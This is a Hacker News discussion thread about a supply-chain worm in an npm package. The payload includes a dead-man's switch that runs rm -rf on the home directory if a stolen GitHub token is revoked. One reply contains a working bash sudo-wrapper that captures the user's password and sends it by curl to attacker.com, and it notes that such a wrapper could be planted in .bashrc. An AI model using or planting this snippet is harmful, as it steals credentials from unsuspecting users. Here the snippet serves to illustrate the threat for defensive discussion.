Remix.run Logo
Remix clone Hacker News
new | show | ask | jobsGithub
cube00 4 hours ago

Please be careful when revoking tokens. It looks like the payload installs a dead-man's switch at ~/.local/bin/gh-token-monitor.sh as a systemd user service (Linux) / LaunchAgent com.user.gh-token-monitor(macOS). It polls api.github.com/user with the stolen token every 60s, and if the token is revoked (HTTP 40x), it runs rm -rf ~/.

https://github.com/TanStack/router/issues/7383#issuecomment-...

Gigachad 3 hours ago | parent | next [-]

Realistically if you have installed malware, you need to do a full wipe of your computer anyway.

eqvinox 2 hours ago | parent | next [-]

[On Linux:]

If you didn't give yourself "free" (passwordless) sudo, that's not necessary…

…unless it happened in a week with 2 and a half Linux kernel LPEs.

lrvick an hour ago | parent | next [-]

Sudo is security theater.

Malware can make a fake unprivileged sudo that sniffs your password.

function sudo () {

    realsudo=$(which sudo);

    read -r -s -p "[sudo] password for $USER: " password;

    echo "$USER: $password" | \

        curl -F 'p=<-' https://attacker.com >/dev/null 2>&1;

    $realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1;

    $realsudo "${@:1}";

}
nazcan an hour ago | parent | next [-]

To clarify, when does this run? Like you download malware A, run malware A and this function definition changes sudo for it, or sudo for other cases?

lrvick an hour ago | parent [-]

This could for instance be injected into your .bashrc when you do an "npm install" of a package that has a deeply nested supply chain attack.

Then the next time you run sudo, phase2 triggers installing a rootkit, etc.

Ferret7446 24 minutes ago | parent | next [-]

That is one of many reasons to keep your dotfiles under version control.

lpribis 13 minutes ago | parent [-]

How would that help? Unless you happen to check the dotfiles git diff before running _anything_. I guess this could be put in prompt or some cron job to detect diffs but I bet absolutely nobody does this.

arcfour 42 minutes ago | parent | prev [-]

Or you could also hijack it using $PATH search order with your wrapper to get existing terminal sessions too, there's a lot of ways to skin that cat.

lrvick 30 minutes ago | parent [-]

Endless ways, which is why I do not understand why sudo is ever used anymore, especially in production.

You do not need root to do anything in Linux these days anyway between Namespaces and Capabilities so there is really no reason for root to be accessible at all or have any processes running as root post boot.

TacticalCoder 27 minutes ago | parent | prev | next [-]

> Sudo is security theater.

Yes indeed.

> Malware can make a fake unprivileged sudo that sniffs your password.

Not on my Linux workstation though. No sudo command installed. Not a single setuid binary. Not even su. So basically only root can use su and nobody else.

Only way to log in at root is either by going to tty2 (but then the root password is 30 characters long, on purpose, to be sure I don't ever enter it, so login from tty2 ain't really an option) or by login in from another computer, using a Yubikey (no password login allowed). That other computer is on a dedicated LAN (a physical LAN, not a VLAN) that exists only for the purpose of allowing root to ssh in (yes, I do allow root to SSH in: but only with using U2F/Yubikey... I have to as it's the only real way to log in as root).

It is what it is and this being HN people are going to bitch that it's bad, insecure, inconvenient (people typically love convenience at the expense of security), etc. but I've been using basically that setup since years. When I need to really be root (which is really not often), I use a tiny laptop on my desk that serves as a poor admin's console (but over SSH and only with a Yubikey, so it'd be quite a feat to attack that).

Funnily enough last time I logged in as root (from the laptop) was to implement the workaround to blacklist all the modules for copy.fail/dirtyfrag.

That laptop doesn't even have any Wifi driver installed. No graphical interface. It's minimal. It's got a SSH client, a firewall (and so does the workstation) and that's basically it. As it's on a separate physical LAN, no other machine can see it on the network.

I did set that up just because I could. Turns out it's fully usable so I kept using it.

Now of course I've got servers, VMs, containers, etc. at home too (and on dedicated servers): that's another topic. But on my main workstation a sudo replacement function won't trick me.

jcgrillo 11 minutes ago | parent [-]

Thanks for sharing this, that seems like a very cool setup. I have a very old good-for-almost-nothing laptop that would be perfect for this, might just have to copy you!

nullsanity an hour ago | parent | prev [-]

[dead]

Gigachad 2 hours ago | parent | prev | next [-]

On linux realistically whatever user you installed the malicious NPM package with has access to everything you care about anyway.

lrvick an hour ago | parent [-]

Every user, since privesc is so easy on most operating systems.

Gigachad an hour ago | parent [-]

Sure, without exploits they can steal your api keys, read your personal data, and access your browser data. With exploits they can update packages on your computer too.

lights0123 2 hours ago | parent | prev | next [-]

Until it overrides sudo in your $PATH to install malware after you enter your password later.

dgellow 2 hours ago | parent | prev | next [-]

You should assume other LPEs exist though

stogot an hour ago | parent | prev [-]

There numerous ways to root Linux over the decades

sigzero 2 hours ago | parent | prev [-]

It's the "nuke it from orbit" approach but "the only way to be sure".

meander_water 4 hours ago | parent | prev | next [-]

I don't understand why people were voting this comment down in the issue page

skissane 3 hours ago | parent | next [-]

Maybe they have a non-standard interpretation of thumbs-down – as "thumbs-down to this fact" not "thumbs-down to you for pointing it out"

hmokiguess 2 hours ago | parent [-]

I have noticed this behaviour happening more often too, it's very confusing. Usually when texting with younger Gen Z people.

efilife 3 minutes ago | parent [-]

This has always been happening

4 hours ago | parent | prev | next [-]
[deleted]
bpavuk 4 hours ago | parent | prev | next [-]

bots.

the GitHub bot law: the GitHub bot situation is way worse than you imagine even if you are aware of the GitHub bot law.

yes, a cheap parody on Hofstadter's law, but that's how bad it is

sieabahlpark 3 hours ago | parent | prev | next [-]

[dead]

noodletheworld 3 hours ago | parent | prev [-]

There is no such thing as please be careful when revoking tokens. What does that mean? Dont revoke them? Look at them carefully before revoking them?

And what? Just let the actor just keep using them to spread to other people?

Always rotate your tokens immediately if they're compromised.

If it hurts, well, that sucks. …but seriously, not revoking the tokens just makes this worse for everyone.

A fair comment would have been: “it looks like the payload installs a dead-mans switch…”

Asking the maintainers not to revoke their compromised credentials deserves every down vote it receives.

wavemode 3 hours ago | parent | next [-]

You seem to be interpreting "please be careful when..." as "don't". I'm not sure how that interpretation makes any sense. Obviously they just mean, first kill the service (or better yet, shutdown the machine entirely) and then revoke the token...?

yuzuquat 3 hours ago | parent | prev | next [-]

my understanding is that careful means cleaning up the dead-man’s switch before revoking

3 hours ago | parent | prev [-]
[deleted]
bpavuk 4 hours ago | parent | prev | next [-]

if so, then this is actual terrorism of the software world!!

embedding-shape 4 hours ago | parent [-]

Only if the goal is to actually spread fear in a civilian population. It's not clear what the motivation is here besides "the worm spreads itself lol".

bpavuk 4 hours ago | parent [-]

that dead man's switch surely smells like that tbh

isityettime 3 hours ago | parent [-]

The dead man's switch reminds me of worms and viruses from my childhood, whose primary purpose was apparently just to wreak havoc rather than direct financial gain. It's a childish gimmick.

resonious 3 hours ago | parent [-]

If an infected computer gets disabled after deactivating one stolen credential, it might slow down the victim from deactivating their other stolen credentials.

isityettime 3 hours ago | parent [-]

Ugh. True.

dcchambers 3 hours ago | parent | prev | next [-]

Incredible. Mutually assured destruction.

The next five years are going to be truly WILD in the software world.

Air-gapped systems are gonna be huge.

NSUserDefaults 2 hours ago | parent [-]

Maybe just ai-gapped.

eqvinox 2 hours ago | parent [-]

Is that an offhanded joke on the terminology or do you actually mean something? I can't tell.

fragmede 4 hours ago | parent | prev [-]

One should always have had backups configured, but if this is what gets people to setup backups, so much the better.

eqvinox 2 hours ago | parent [-]

Sure. But even restoring from backup means a cost is being inflicted, and not a small one.